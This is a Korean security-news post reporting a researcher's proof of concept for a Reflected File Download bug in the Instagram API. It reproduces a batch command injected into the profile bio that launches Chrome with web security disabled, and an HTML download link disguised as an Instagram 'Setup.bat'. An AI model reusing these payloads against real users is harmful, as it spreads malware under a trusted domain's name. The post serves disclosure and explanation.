[해외보안동향] 악성파일을 다운로드받을 수 있는 인스타그램 API 버그 발견

악성파일을 다운로드받을 수 있는 인스타그램 API 버그 발견

INSTAGRAM REFLECTED FILENAME DOWNLOAD

보안전문가 David Sopas가 인스타그램 API에서 RFD를 발견했다고 밝혔습니다. 이 버그는 악성 링크를 포함한 메시지를 포스팅할 수 있도록 허용합니다. 이 링크를 클릭하면 악성 파일을 다운로드받을 수 있는 페이지로 연결됩니다. 

   

※ RFD(Reflected File Download)란?

사용자가 신뢰성 있는 도메인의 악성링크를 클릭하여 악성파일을 다운로드받는 방법입니다. 사용자가 악성링크를 통해 다운로드받은 파일을 실행시키면, 사용자의 PC는 악성코드에 감염됩니다. 기존의 웹을 통해 유포되는 악성코드와는 달리, 신뢰성 있는 도메인에 URL을 노출시켜 악성파일을 다운로드받도록 유도하고 있습니다.

                           

사용자들은 이렇게 인스타그램에 노출된 악성링크를 클릭하여 파일을 다운로드받을 수 있습니다. 사용자들은 파일의 출처가 인스타그램이라고 적혀있기 때문에 안심하고 파일을 다운로드받습니다. 하지만 이 파일은 정상파일을 가장한 악성파일입니다.

     

                 

Sopas는 이번 인스타그램 API 버그를 아래와 같이 증명하고 있습니다.

                  

이번에 인스타그램 API에서 RFD를 발견했습니다. 사용자 계정의 ‘소개’ 필드와 같이 지속적으로 업데이트되는 필드를 사용하기 때문에, URL에 추가적으로 커맨드를 작성할 필요도 없습니다. 그렇다면, 여기서 우리는 뭐가 필요할까요? 토큰입니다. 이 토큰을 얻기 위해서는 새 계정 등록이 필요합니다.

         

그리고 다음 단계에서 사용하고자 하는 배치 커멘드를 사용자 계정의 '소개' 필드에 삽입합니다. 이후 크롬 브라우저를 열어 대부분의 보호장치를 비활성화시키는 악성페이지 열람을 시도합니다.

   

 https://www.youtube.com/watch?v=zwcB4J0HQ7Y

참고로, 위의 페이지는 악성페이지가 아닙니다. 순수한 텍스트입니다. 방금 등록한 계정으로 인스타그램의 JSON 파일을 방문하면 아래와 같은 내용을 확인할 수 있습니다.

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

    

그다음은 Filename 섹션이 필요합니다. 인스타그램의 파일명 제한 때문에 HTML5 속성을 사용하겠습니다. 이 상황에서는 아래의 브라우저만을 지원하고 있습니다.

크롬

오페라

안드로이드 브라우저

안드로이드용 크롬

파이어폭스

사용자는 HTML 코드로 복제할 수 있습니다.

<a href="https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a" download="Setup.bat" onclick="return false;">Install Instagram new Photo Effects</a>

 

이 코드는 사용자의 신뢰를 얻기 위해 아래의 그림과 같이 파일이 인스타그램으로부터 다운로드되는 것처럼 표시합니다. 

  

해당 버그를 통해 아래와 같은 경로로 사용자의 PC가 악성코드에 감염됩니다.

 

1. 특별히 제작된 페이지로 유도하는 링크를 인스타그램에 포스팅하여 모든 팔로워에게 노출시킵니다.

2. 해당 링크를 클릭한 사용자들은 이 파일이 인스타그램의 서버에 있다는 것을 확인한 후 실행시킵니다.

3. 사용자의 PC가 악성코드에 감염됩니다. 

               

해당 버그의 개념을 증명하는 영상은 유튜브에서 더욱 자세히 확인하실 수  있습니다.

   

▶ 유튜브 링크 : https://www.youtube.com/watch?v=zwcB4J0HQ7Y

 

참고 :

http://www.websegura.net/advisories/instagram-reflected-filename-download/

https://threatpost.com/instagram-api-bug-could-allow-malicious-file-downloads/111784